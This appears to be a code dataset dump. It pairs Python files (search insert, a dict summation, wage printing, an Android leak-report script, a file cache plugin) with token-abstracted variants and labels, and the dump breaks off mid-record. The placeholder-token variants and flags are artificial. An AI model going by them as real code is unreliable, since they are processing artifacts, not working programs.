[ "'''\nGiven a sorted array and a target value, return the index if the target is found.\nIf not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n[1,3,5,6], 5 -> 2\n[1,3,5,6], 2 -> 1\n[1,3,5,6], 7 -> 4\n[1,3,5,6], 0 -> 0\n'''\n\nclass Solution(object):\n def searchInsert(self, nums, target):\n if target < nums[0]:\n return 0\n if target > nums[-1]:\n return len(nums)\n\n l_idx, h_idx = 0, len(nums)-1\n\n while True:\n m_idx = int((l_idx+h_idx)/2)\n if l_idx >= h_idx:\n return l_idx\n elif target > nums[m_idx]:\n l_idx = m_idx + 1\n else:\n h_idx = m_idx\n\nsol = Solution()\nprint sol.searchInsert([1,3,5,6], 5)\nprint sol.searchInsert([1,3,5,6], 2)\nprint sol.searchInsert([1,3,5,6], 4)\nprint sol.searchInsert([1,3,5,6], 0)\n\n" ]
true
13
2cbce618d1ec617d1c7dc0e9792b6a49361ec5a4
def mais_populoso(dic): p=0 sp=0 for t,i in dic.items(): for m in dic[t].values(): p+=m if p>sp: sp=p x=t return x
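
A note on the function above: the accumulator p is never reset between outer keys, so totals leak from one entry of dic into the next, and the function appears to return the last key with a positive inner sum rather than the largest one. Below is a hedged rewrite of the behaviour the name mais_populoso ("most populous") suggests, with a made-up sample dict:

def mais_populoso_fixed(dic):
    # Return the outer key whose inner population values sum highest.
    return max(dic, key=lambda t: sum(dic[t].values()))

print(mais_populoso_fixed({'BR': {'a': 10, 'b': 5}, 'PT': {'c': 7}}))  # BR
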
[ "def mais_populoso(dic):\n p=0\n sp=0\n for t,i in dic.items():\n for m in dic[t].values():\n p+=m\n if p>sp:\n sp=p\n x=t\n return x", "def mais_populoso(dic):\n p = 0\n sp = 0\n for t, i in dic.items():\n for m in dic[t].values():\n p += m\n if p > sp:\n sp = p\n x = t\n return x\n", "<function token>\n" ]
false
14
2092ead8b8f268a22711b8af8052241c1ac00c15
wage=5 print("%d시간에 %d%s 벌었습니다." %(1, wage*1, "달러")) print("%d시간에 %d%s 벌었습니다." %(5, wage*5, "달러")) print("%d시간에 %.1f%s 벌었습니다" %(1,5710.8,"원")) print("%d시간에 %.1f%s 벌었습니다" %(5, 28554.0, "원"))
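
The %-directives above map one to one onto f-strings: %d interpolates an integer, %.1f keeps exactly one decimal place, and the record's hard-coded 28554.0 is just 5710.8 * 5. A minimal Python 3 sketch reusing the record's Korean phrasing ("earned N dollars/won in N hours"):

wage = 5
for hours in (1, 5):
    print(f"{hours}시간에 {wage * hours}달러 벌었습니다.")     # %d -> integer
    print(f"{hours}시간에 {5710.8 * hours:.1f}원 벌었습니다")  # %.1f -> one decimal
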
[ "\nwage=5\n\nprint(\"%d시간에 %d%s 벌었습니다.\" %(1, wage*1, \"달러\"))\nprint(\"%d시간에 %d%s 벌었습니다.\" %(5, wage*5, \"달러\"))\n\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(1,5710.8,\"원\"))\nprint(\"%d시간에 %.1f%s 벌었습니다\" %(5, 28554.0, \"원\"))\n\n", "wage = 5\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n", "<assignment token>\nprint('%d시간에 %d%s 벌었습니다.' % (1, wage * 1, '달러'))\nprint('%d시간에 %d%s 벌었습니다.' % (5, wage * 5, '달러'))\nprint('%d시간에 %.1f%s 벌었습니다' % (1, 5710.8, '원'))\nprint('%d시간에 %.1f%s 벌었습니다' % (5, 28554.0, '원'))\n", "<assignment token>\n<code token>\n" ]
false
15
b5cbb73c152dd60e9063d5a19f6182e2264fec6d
#!/usr/bin/python # coding=UTF-8 import sys import subprocess import os def printReportTail(reportHtmlFile): reportHtmlFile.write(""" </body> </html> """) def printReportHead(reportHtmlFile): reportHtmlFile.write("""<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> """) def printTitle(reportHtmlFile, title): reportHtmlFile.write("<h2>" + title + "</h2>\n") def printText(reportHtmlFile, text): reportHtmlFile.write("<h4>" + text + "</h4>\n") def printSVG(reportHtmlFile, svgPath): reportHtmlFile.write('<embed src="') reportHtmlFile.write(svgPath) reportHtmlFile.write('" type="image/svg+xml" />') def ParseStack(currentPath, ndkPath, stackFile, architecture, symbolsDir): print "currentPath: " + currentPath # 查找addr2line文件 print "architecture is " + architecture if architecture == "arm64-v8a": addr2line = ndkPath + "/toolchains/aarch64-linux-android-4.9/prebuilt/darwin-x86_64/bin/aarch64-linux-android-addr2line" elif architecture == "armeabi" or architecture == "armeabi-v7a": addr2line = ndkPath + "/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-addr2line" else: print "do not support architecture type for " + architecture print "only support armeabi/armeabi-v7a/arm64-v8a" return print "addr2line path: " + addr2line if not os.path.exists(addr2line): print "can not find " + architecture + " addr2line" else: print "find " + architecture + " addr2line" reportHtmlPath = os.path.split(stackFile)[0] + "/leakReport.html" if os.path.exists(reportHtmlPath): os.unlink(reportHtmlPath) reportHtmlFile = open(reportHtmlPath, "a") printReportHead(reportHtmlFile) # 处理stack文件 for line in open(stackFile): if line.startswith("libName:"): libName = line.replace("libName:", "").replace('\n', '').replace('\r', '') printTitle(reportHtmlFile, libName) libAbsolutePath = os.path.split(stackFile)[0] + "/" + libName if not os.path.exists(libAbsolutePath): os.makedirs(libAbsolutePath) flStackFilePath = libAbsolutePath + "/fl_stack.txt" flameGraphFile = open(flStackFilePath, "w") print "find lib: " + libName elif line.startswith("leakSize:"): leakSize = line.replace("leakSize:", "").replace('\n', '').replace('\r', '') leakMsg = "leak size: " + leakSize + "\n" printText(reportHtmlFile, leakMsg) print leakMsg elif line.startswith("stack:"): stack = line.replace("stack:", "").replace('\n', '').replace('\r', '') # print "stack: " for stackElement in stack.split("^"): if stackElement == "": continue dlinfo = stackElement.split("|") pc = dlinfo[0] libPath = dlinfo[1] symbol = dlinfo[2] # print "pc " + pc + " " + libPath + " " + symbol symbolFile = symbolsDir + "/" + os.path.split(libPath)[1] if os.path.exists(symbolFile): # print "---------" parseCommend = addr2line + " -Ce " + symbolFile + " -f " + pc # print parseCommend # os.system(parseCommend) result = os.popen(parseCommend) res = result.read() retraces = res.splitlines() if len(retraces) != 2 or "?" in retraces[0] or "?" 
in retraces[1]: if symbol != "": method = symbol codeLine = -1 else: method = pc codeLine = -1 else: method = retraces[0] codeLine = retraces[1] # print method # print codeLine elif symbol != "": method = symbol codeLine = -1 else: method = pc codeLine = -1 flameGraphFile.write(method + ";") flameGraphFile.write(" 1\n") elif line.replace('\n', '').replace('\r', '') == "libSplit!!!": # 结束了一个lib的输出 print "finish lib " + libName + " parse" plExePath = os.path.split(currentPath)[0] + "/flamegraph.pl" svgPath = libAbsolutePath + "/" + libName + ".svg" commend = plExePath + " " + flStackFilePath + " > " + svgPath os.system(commend) printSVG(reportHtmlFile, svgPath.replace(os.path.split(libAbsolutePath)[0], "./")) printReportTail(reportHtmlFile) def main(args): if 4 > len(args): print("请输入\"android ndk路径\" \"stack文件路径\" \"arm架构(armeabi/armeabi-v7a/arm64-v8a)\" \"带符号表so所在目录\"") return ParseStack(args[0], args[1], args[2], args[3], args[4]) if __name__ == "__main__": main(sys.argv)
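
Two hedged notes on the script above: its Python 2 print statements keep it from parsing as Python 3, and the guard if 4 > len(args) still lets args[4] raise IndexError when exactly four values arrive, since args includes the script name. Its core move, pc-to-source symbolication through addr2line, fits in a few Python 3 lines; the binary and symbol-file paths are the caller's assumptions here, and subprocess stands in for os.popen:

import subprocess

def symbolicate(addr2line_bin, symbol_file, pc):
    # -C demangles C++ names, -f adds the function name, -e selects the
    # .so that still carries symbols; output is "function" then "file:line".
    out = subprocess.run([addr2line_bin, "-C", "-f", "-e", symbol_file, pc],
                         capture_output=True, text=True).stdout.splitlines()
    if len(out) == 2 and "?" not in out[0] and "?" not in out[1]:
        return out[0], out[1]
    return pc, None  # fall back to the raw program counter
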
[ "#!/usr/bin/python\n# coding=UTF-8\n\nimport sys\nimport subprocess\nimport os\n\ndef printReportTail(reportHtmlFile):\n reportHtmlFile.write(\"\"\"\n</body>\n</html>\n\"\"\")\n\ndef printReportHead(reportHtmlFile):\n reportHtmlFile.write(\"\"\"<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>Document</title>\n</head>\n<body>\n\"\"\")\n\ndef printTitle(reportHtmlFile, title):\n reportHtmlFile.write(\"<h2>\" + title + \"</h2>\\n\")\n\ndef printText(reportHtmlFile, text):\n reportHtmlFile.write(\"<h4>\" + text + \"</h4>\\n\")\n\ndef printSVG(reportHtmlFile, svgPath):\n reportHtmlFile.write('<embed src=\"')\n reportHtmlFile.write(svgPath)\n reportHtmlFile.write('\" type=\"image/svg+xml\" />')\n\ndef ParseStack(currentPath, ndkPath, stackFile, architecture, symbolsDir):\n print \"currentPath: \" + currentPath\n # 查找addr2line文件\n print \"architecture is \" + architecture\n if architecture == \"arm64-v8a\":\n addr2line = ndkPath + \"/toolchains/aarch64-linux-android-4.9/prebuilt/darwin-x86_64/bin/aarch64-linux-android-addr2line\"\n elif architecture == \"armeabi\" or architecture == \"armeabi-v7a\":\n addr2line = ndkPath + \"/toolchains/arm-linux-androideabi-4.9/prebuilt/darwin-x86_64/bin/arm-linux-androideabi-addr2line\"\n else:\n print \"do not support architecture type for \" + architecture\n print \"only support armeabi/armeabi-v7a/arm64-v8a\"\n return\n\n print \"addr2line path: \" + addr2line\n if not os.path.exists(addr2line):\n print \"can not find \" + architecture + \" addr2line\"\n else:\n print \"find \" + architecture + \" addr2line\"\n\n reportHtmlPath = os.path.split(stackFile)[0] + \"/leakReport.html\"\n if os.path.exists(reportHtmlPath):\n os.unlink(reportHtmlPath)\n reportHtmlFile = open(reportHtmlPath, \"a\")\n printReportHead(reportHtmlFile)\n\n # 处理stack文件\n for line in open(stackFile): \n\n if line.startswith(\"libName:\"):\n libName = line.replace(\"libName:\", \"\").replace('\\n', '').replace('\\r', '')\n\n printTitle(reportHtmlFile, libName)\n \n libAbsolutePath = os.path.split(stackFile)[0] + \"/\" + libName\n if not os.path.exists(libAbsolutePath):\n os.makedirs(libAbsolutePath)\n flStackFilePath = libAbsolutePath + \"/fl_stack.txt\"\n flameGraphFile = open(flStackFilePath, \"w\")\n print \"find lib: \" + libName\n elif line.startswith(\"leakSize:\"):\n leakSize = line.replace(\"leakSize:\", \"\").replace('\\n', '').replace('\\r', '')\n\n leakMsg = \"leak size: \" + leakSize + \"\\n\"\n\n printText(reportHtmlFile, leakMsg)\n\n print leakMsg\n elif line.startswith(\"stack:\"):\n stack = line.replace(\"stack:\", \"\").replace('\\n', '').replace('\\r', '')\n # print \"stack: \"\n for stackElement in stack.split(\"^\"):\n if stackElement == \"\":\n continue\n \n dlinfo = stackElement.split(\"|\")\n pc = dlinfo[0]\n libPath = dlinfo[1]\n symbol = dlinfo[2]\n # print \"pc \" + pc + \" \" + libPath + \" \" + symbol\n symbolFile = symbolsDir + \"/\" + os.path.split(libPath)[1]\n if os.path.exists(symbolFile):\n # print \"---------\"\n parseCommend = addr2line + \" -Ce \" + symbolFile + \" -f \" + pc\n # print parseCommend\n # os.system(parseCommend)\n result = os.popen(parseCommend) \n res = result.read() \n retraces = res.splitlines()\n if len(retraces) != 2 or \"?\" in retraces[0] or \"?\" in retraces[1]:\n if symbol != \"\":\n method = symbol\n codeLine = -1\n else:\n method = pc\n codeLine = -1\n else:\n method = retraces[0]\n codeLine = retraces[1]\n # print 
method\n # print codeLine\n elif symbol != \"\":\n method = symbol\n codeLine = -1\n else:\n method = pc\n codeLine = -1\n \n flameGraphFile.write(method + \";\")\n flameGraphFile.write(\" 1\\n\")\n elif line.replace('\\n', '').replace('\\r', '') == \"libSplit!!!\":\n # 结束了一个lib的输出\n print \"finish lib \" + libName + \" parse\"\n plExePath = os.path.split(currentPath)[0] + \"/flamegraph.pl\"\n svgPath = libAbsolutePath + \"/\" + libName + \".svg\"\n commend = plExePath + \" \" + flStackFilePath + \" > \" + svgPath\n os.system(commend)\n\n printSVG(reportHtmlFile, svgPath.replace(os.path.split(libAbsolutePath)[0], \"./\"))\n\n printReportTail(reportHtmlFile)\n\ndef main(args):\n if 4 > len(args):\n print(\"请输入\\\"android ndk路径\\\" \\\"stack文件路径\\\" \\\"arm架构(armeabi/armeabi-v7a/arm64-v8a)\\\" \\\"带符号表so所在目录\\\"\")\n return\n ParseStack(args[0], args[1], args[2], args[3], args[4])\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n" ]
true
16
805fc9a26650f85227d14da972311ffbd9dbd555
class Date: def __init__(self, strDate): strDate = strDate.split('.') self.day = strDate[0] self.month = strDate[1] self.year = strDate[2]
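
The class above keeps day, month and year as strings. For comparison only (parse_date and the sample date are invented here), the standard library performs the same decomposition with validation and integer fields:

from datetime import datetime

def parse_date(s):
    # Expects "DD.MM.YYYY", the '.'-separated layout the class splits on.
    d = datetime.strptime(s, "%d.%m.%Y")
    return d.day, d.month, d.year

print(parse_date("24.12.2021"))  # (24, 12, 2021)
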
[ "class Date:\n def __init__(self, strDate):\n strDate = strDate.split('.')\n self.day = strDate[0]\n self.month = strDate[1]\n self.year = strDate[2]\n", "class Date:\n\n def __init__(self, strDate):\n strDate = strDate.split('.')\n self.day = strDate[0]\n self.month = strDate[1]\n self.year = strDate[2]\n", "class Date:\n <function token>\n", "<class token>\n" ]
false
17
a7218971b831e2cfda9a035eddb350ecf1cdf938
#!/usr/bin/python # encoding: utf-8 # # In case of reuse of this source code please do not remove this copyright. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # For more information on the GNU General Public License see: # <http://www.gnu.org/licenses/>. # from Components.config import config from datetime import datetime import os MinCacheLimit = config.EMC.min_file_cache_limit.getValue() pathisfile = os.path.isfile pathisdir = os.path.isdir pathislink = os.path.islink pathexists = os.path.exists pathreal = os.path.realpath idx_isLink=0 idx_isDir=1 idx_isFile=2 idx_Date=3 idx_realpath=4 idx_num=5 class EMCFileCache(): def __init__(self): self.cacheDirectoryList = {} self.cacheFileList = {} self.cacheAttributeList = {} self.cacheCountSizeList = {} def addCountSizeToCache(self, path, count, size): # print "EMC addCountSizeToCache", path if self.cacheCountSizeList.has_key(path): lastcount, lastsize = self.cacheCountSizeList[path] if lastcount != count or lastsize != size: del self.cacheCountSizeList[path] self.cacheCountSizeList[path] = count, size else: self.cacheCountSizeList[path] = count, size # print "EMC addCountSizeToCache", self.cacheCountSizeList def getCountSizeFromCache(self, path): if self.cacheCountSizeList.has_key(path): return self.cacheCountSizeList[path] else: return None # print "EMC getCountSizeFromCache", self.cacheCountSizeList def delcacheCountSizeList(self): self.cacheCountSizeList = {} print "EMC delete cacheCountSizeList", self.cacheCountSizeList def delcacheCountSizeListEntriesOnFileOp(self,path): #print "EMC delcacheCountSizeListEntriesOnFileOp",path rescanPaths = [] if path: for k in self.cacheCountSizeList.keys(): if (k+"/").startswith(path+"/") or (path+"/").startswith(k+"/"): # drop dirs containing path, but not "a/bc" when path is "a/bcd/e", therefore append "/" del self.cacheCountSizeList[k] rescanPaths.append(k) #print "EMC delcacheCountSizeListEntriesOnFileOp IS deleting",k," due to OP on path ",path #else: #print "EMC delcacheCountSizeListEntriesOnFileOp NOT deleting",k," due to OP on path ",path return rescanPaths def IsPathInCountSizeList(self, path): if self.cacheCountSizeList.has_key(path): return True else: return False def addPathToCache(self, path, subdirlist, filelist, MovieCenterInst): if config.EMC.files_cache.value: print "EMC addPathToCache", path if (len(subdirlist)>MinCacheLimit) or (len(filelist)>MinCacheLimit): self.cacheDirectoryList[path] = subdirlist for p, n, e in subdirlist: if not (p in self.cacheAttributeList): AttributeList=[None]*idx_num AttributeList[idx_isLink] = pathislink(p) AttributeList[idx_isDir] = True # we are in subdirlist AttributeList[idx_isFile] = False # we are in subdirlist AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, True) AttributeList[idx_realpath] = pathreal(p) #for dirs only self.cacheAttributeList[p] = AttributeList self.cacheFileList[path] = filelist for p, n, e in filelist: if not (p in self.cacheAttributeList): AttributeList=[None]*idx_num AttributeList[idx_isLink] = pathislink(p) AttributeList[idx_isDir] = False # we are in filelist, no 
entry is a real directrory ... AttributeList[idx_isFile] = pathisfile(p) # ... but filelist might contain virtual directories AttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, False) #AttributeList[idx_realpath] = pathreal(p) #for dirs only self.cacheAttributeList[p] = AttributeList else: if self.cacheDirectoryList.has_key(path): self.deleteAssociatedListEntries(self.cacheDirectoryList[path]) del self.cacheDirectoryList[path] if self.cacheFileList.has_key(path): self.deleteAssociatedListEntries(self.cacheFileList[path]) del self.cacheFileList[path] # self.debugPrintDirCache() # self.debugPrintFileCache() # self.debugPrintFileAttributeCache() def addRecToCacheFileList(self, path, rec): if config.EMC.files_cache.value: if self.cacheFileList.has_key(path): filelist = self.cacheFileList[path] filelist.append(rec) del self.cacheFileList[path] self.cacheFileList[path] = filelist def getCacheForPath(self, path): print "EMC getCacheForPath", path if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path): subdirlist = self.cacheDirectoryList[path] filelist = self.cacheFileList[path] # self.debugPrintDirCache() # self.debugPrintFileCache() # self.debugPrintFileAttributeCache() return subdirlist, filelist else: return None, None def isLink(self, path): isLink = None if config.EMC.files_cache.value and (path in self.cacheAttributeList): isLink = self.cacheAttributeList[path][idx_isLink] if isLink is None: isLink = pathislink(path) return isLink def isDir(self, path): isDir = None if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList): isDir = self.cacheAttributeList[path][idx_isDir] if isDir is None: isDir = pathisdir(path) return isDir def isFile(self, path): isFile = None if (config.EMC.check_dead_links.value != "always") and config.EMC.files_cache.value and (path in self.cacheAttributeList): isFile = self.cacheAttributeList[path][idx_isFile] if isFile is None: isFile = pathisfile(path) return isFile def realpath(self, path): realpath = None if config.EMC.files_cache.value and (path in self.cacheAttributeList): realpath = self.cacheAttributeList[path][idx_realpath] if realpath is None: realpath = pathreal(path) return realpath def getDateInfoFromCacheForPath(self, path): if config.EMC.files_cache.value and (path in self.cacheAttributeList): return self.cacheAttributeList[path][idx_Date] else: return None def getDirsFromCacheForPath(self, path): if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path): subdirlist = self.cacheDirectoryList[path] return subdirlist else: return None def getFilesFromCacheForPath(self, path): if config.EMC.files_cache.value and self.cacheFileList.has_key(path): filelist = self.cacheFileList[path] return filelist else: return None def IsPathInCache(self, path): if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path): return True else: return False def IsPathWithDirsInCache(self, path): if config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path): return True else: return False def IsPathWithFilesInCache(self, path): if config.EMC.files_cache.value and self.cacheFileList.has_key(path): return True else: return False def delPathFromCache(self, path): if len(path)>1 and path[-1]=="/": path = path[:-1] print "EMC delPathFromCache", path if self.cacheDirectoryList.has_key(path): self.deleteAssociatedListEntries(self.cacheDirectoryList[path]) del 
self.cacheDirectoryList[path] if self.cacheFileList.has_key(path): self.deleteAssociatedListEntries(self.cacheFileList[path]) del self.cacheFileList[path] # self.debugPrintDirCache() # self.debugPrintFileCache() # self.debugPrintFileAttributeCache() def delPathFromDirCache(self, path): if len(path)>1 and path[-1]=="/": path = path[:-1] if self.cacheDirectoryList.has_key(path): self.deleteAssociatedListEntries(self.cacheDirectoryList[path]) del self.cacheDirectoryList[path] def delPathFromFileCache(self, path): if len(path)>1 and path[-1]=="/": path = path[:-1] if self.cacheFileList.has_key(path): self.deleteAssociatedListEntries(self.cacheFileList[path]) del self.cacheFileList[path] def debugPrintFileCache(self): print "cacheFileList:" for p in self.cacheFileList: print p,self.cacheFileList[p] print "" def debugPrintDirCache(self): print "cacheDirectoryList:" for p in self.cacheDirectoryList: print p,self.cacheDirectoryList[p] print "" def debugPrintFileAttributeCache(self): print "cacheAttributeList:" for p in self.cacheAttributeList: print p,self.cacheAttributeList[p] print "" def deleteAssociatedListEntries(self, list): for p, n, e in list: if p in self.cacheAttributeList and (config.EMC.check_dead_links.value != "only_initially"): del self.cacheAttributeList[p] movieFileCache = EMCFileCache()
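
The plugin code above hand-rolls per-path caches of islink/isdir/isfile/realpath and invalidates them on file operations; its dict.has_key calls are Python 2 only, which presumably explains the single raw step and the error flag below. The same memoisation idea reduced to a Python 3 sketch (path_attrs is an illustrative name, not the plugin's API):

import os
from functools import lru_cache

@lru_cache(maxsize=None)
def path_attrs(path):
    # One cached probe bundle per path: (is_link, is_dir, is_file, realpath).
    return (os.path.islink(path), os.path.isdir(path),
            os.path.isfile(path), os.path.realpath(path))

print(path_attrs("/tmp"))
# Any move or delete must drop stale entries, as delPathFromCache does:
path_attrs.cache_clear()
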
[ "#!/usr/bin/python\n# encoding: utf-8\n#\n# In case of reuse of this source code please do not remove this copyright.\n#\n#\tThis program is free software: you can redistribute it and/or modify\n#\tit under the terms of the GNU General Public License as published by\n#\tthe Free Software Foundation, either version 3 of the License, or\n#\t(at your option) any later version.\n#\n#\tThis program is distributed in the hope that it will be useful,\n#\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n#\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#\tGNU General Public License for more details.\n#\n#\tFor more information on the GNU General Public License see:\n#\t<http://www.gnu.org/licenses/>.\n#\n\nfrom Components.config import config\nfrom datetime import datetime\nimport os\n\nMinCacheLimit = config.EMC.min_file_cache_limit.getValue()\npathisfile = os.path.isfile\npathisdir = os.path.isdir\npathislink = os.path.islink\npathexists = os.path.exists\npathreal = os.path.realpath\n\nidx_isLink=0\nidx_isDir=1\nidx_isFile=2\nidx_Date=3\nidx_realpath=4\nidx_num=5\n\nclass EMCFileCache():\n\tdef __init__(self):\n\t\tself.cacheDirectoryList = {}\n\t\tself.cacheFileList = {}\n\t\tself.cacheAttributeList = {}\n\t\tself.cacheCountSizeList = {}\n\n\tdef addCountSizeToCache(self, path, count, size):\n#\t\tprint \"EMC addCountSizeToCache\", path\n\t\tif self.cacheCountSizeList.has_key(path):\n\t\t\tlastcount, lastsize = self.cacheCountSizeList[path]\n\t\t\tif lastcount != count or lastsize != size:\n\t\t\t\tdel self.cacheCountSizeList[path]\n\t\t\t\tself.cacheCountSizeList[path] = count, size\n\t\telse:\n\t\t\tself.cacheCountSizeList[path] = count, size\n#\t\tprint \"EMC addCountSizeToCache\", self.cacheCountSizeList\n\n\tdef getCountSizeFromCache(self, path):\n\t\tif self.cacheCountSizeList.has_key(path):\n\t\t\treturn self.cacheCountSizeList[path]\n\t\telse:\n\t\t\treturn None\n#\t\tprint \"EMC getCountSizeFromCache\", self.cacheCountSizeList\n\n\tdef delcacheCountSizeList(self):\n\t\tself.cacheCountSizeList = {}\n\t\tprint \"EMC delete cacheCountSizeList\", self.cacheCountSizeList\n\n\tdef delcacheCountSizeListEntriesOnFileOp(self,path):\n\t\t#print \"EMC delcacheCountSizeListEntriesOnFileOp\",path\n\t\trescanPaths = []\n\t\tif path:\n\t\t\tfor k in self.cacheCountSizeList.keys():\n\t\t\t\tif (k+\"/\").startswith(path+\"/\") or (path+\"/\").startswith(k+\"/\"): # drop dirs containing path, but not \"a/bc\" when path is \"a/bcd/e\", therefore append \"/\"\n\t\t\t\t\tdel self.cacheCountSizeList[k]\n\t\t\t\t\trescanPaths.append(k)\n\t\t\t\t\t#print \"EMC delcacheCountSizeListEntriesOnFileOp IS deleting\",k,\" due to OP on path \",path\n\t\t\t\t#else:\n\t\t\t\t\t#print \"EMC delcacheCountSizeListEntriesOnFileOp NOT deleting\",k,\" due to OP on path \",path\n\t\treturn rescanPaths\n\n\tdef IsPathInCountSizeList(self, path):\n\t\tif self.cacheCountSizeList.has_key(path):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef addPathToCache(self, path, subdirlist, filelist, MovieCenterInst):\n\t\tif config.EMC.files_cache.value:\n\t\t\tprint \"EMC addPathToCache\", path\n\t\t\tif (len(subdirlist)>MinCacheLimit) or (len(filelist)>MinCacheLimit):\n\t\t\t\tself.cacheDirectoryList[path] = subdirlist\n\t\t\t\tfor p, n, e in subdirlist:\n\t\t\t\t\tif not (p in self.cacheAttributeList):\n\t\t\t\t\t\tAttributeList=[None]*idx_num\n\t\t\t\t\t\tAttributeList[idx_isLink] = pathislink(p)\n\t\t\t\t\t\tAttributeList[idx_isDir] = True # we are in 
subdirlist\n\t\t\t\t\t\tAttributeList[idx_isFile] = False # we are in subdirlist\n\t\t\t\t\t\tAttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, True)\n\t\t\t\t\t\tAttributeList[idx_realpath] = pathreal(p) #for dirs only\n\t\t\t\t\t\tself.cacheAttributeList[p] = AttributeList\n\t\t\t\tself.cacheFileList[path] = filelist\n\t\t\t\tfor p, n, e in filelist:\n\t\t\t\t\tif not (p in self.cacheAttributeList):\n\t\t\t\t\t\tAttributeList=[None]*idx_num\n\t\t\t\t\t\tAttributeList[idx_isLink] = pathislink(p)\n\t\t\t\t\t\tAttributeList[idx_isDir] = False # we are in filelist, no entry is a real directrory ...\n\t\t\t\t\t\tAttributeList[idx_isFile] = pathisfile(p) # ... but filelist might contain virtual directories\n\t\t\t\t\t\tAttributeList[idx_Date] = pathexists(p) and MovieCenterInst.checkDate(p, False)\n\t\t\t\t\t\t#AttributeList[idx_realpath] = pathreal(p) #for dirs only\n\t\t\t\t\t\tself.cacheAttributeList[p] = AttributeList\n\t\t\telse:\n\t\t\t\tif self.cacheDirectoryList.has_key(path):\n\t\t\t\t\tself.deleteAssociatedListEntries(self.cacheDirectoryList[path])\n\t\t\t\t\tdel self.cacheDirectoryList[path]\n\t\t\t\tif self.cacheFileList.has_key(path):\n\t\t\t\t\tself.deleteAssociatedListEntries(self.cacheFileList[path])\n\t\t\t\t\tdel self.cacheFileList[path]\n#\t\tself.debugPrintDirCache()\n#\t\tself.debugPrintFileCache()\n#\t\tself.debugPrintFileAttributeCache()\n\n\tdef addRecToCacheFileList(self, path, rec):\n\t\tif config.EMC.files_cache.value:\n\t\t\tif self.cacheFileList.has_key(path):\n\t\t\t\tfilelist = self.cacheFileList[path]\n\t\t\t\tfilelist.append(rec)\n\t\t\t\tdel self.cacheFileList[path]\n\t\t\t\tself.cacheFileList[path] = filelist\n\n\tdef getCacheForPath(self, path):\n\t\tprint \"EMC getCacheForPath\", path\n\t\tif config.EMC.files_cache.value and self.cacheDirectoryList.has_key(path) and self.cacheFileList.has_key(path):\n\t\t\tsubdirlist = self.cacheDirectoryList[path]\n\t\t\tfilelist = self.cacheFileList[path]\n#\t\t\tself.debugPrintDirCache()\n#\t\t\tself.debugPrintFileCache()\n#\t\t\tself.debugPrintFileAttributeCache()\n\t\t\treturn subdirlist, filelist\n\t\telse:\n\t\t\treturn None, None\n\n\tdef isLink(self, path):\n\t\tisLink = None\n\t\tif config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\tisLink = self.cacheAttributeList[path][idx_isLink]\n\t\tif isLink is None:\n\t\t\tisLink = pathislink(path)\n\t\treturn isLink\n\n\tdef isDir(self, path):\n\t\tisDir = None\n\t\tif (config.EMC.check_dead_links.value != \"always\") and config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\tisDir = self.cacheAttributeList[path][idx_isDir]\n\t\tif isDir is None:\n\t\t\tisDir = pathisdir(path)\n\t\treturn isDir\n\n\tdef isFile(self, path):\n\t\tisFile = None\n\t\tif (config.EMC.check_dead_links.value != \"always\") and config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\tisFile = self.cacheAttributeList[path][idx_isFile]\n\t\tif isFile is None:\n\t\t\tisFile = pathisfile(path)\n\t\treturn isFile\n\n\tdef realpath(self, path):\n\t\trealpath = None\n\t\tif config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\trealpath = self.cacheAttributeList[path][idx_realpath]\n\t\tif realpath is None:\n\t\t\trealpath = pathreal(path)\n\t\treturn realpath\n\n\tdef getDateInfoFromCacheForPath(self, path):\n\t\tif config.EMC.files_cache.value and (path in self.cacheAttributeList):\n\t\t\treturn self.cacheAttributeList[path][idx_Date]\n\t\telse:\n\t\t\treturn None\n\n\tdef 
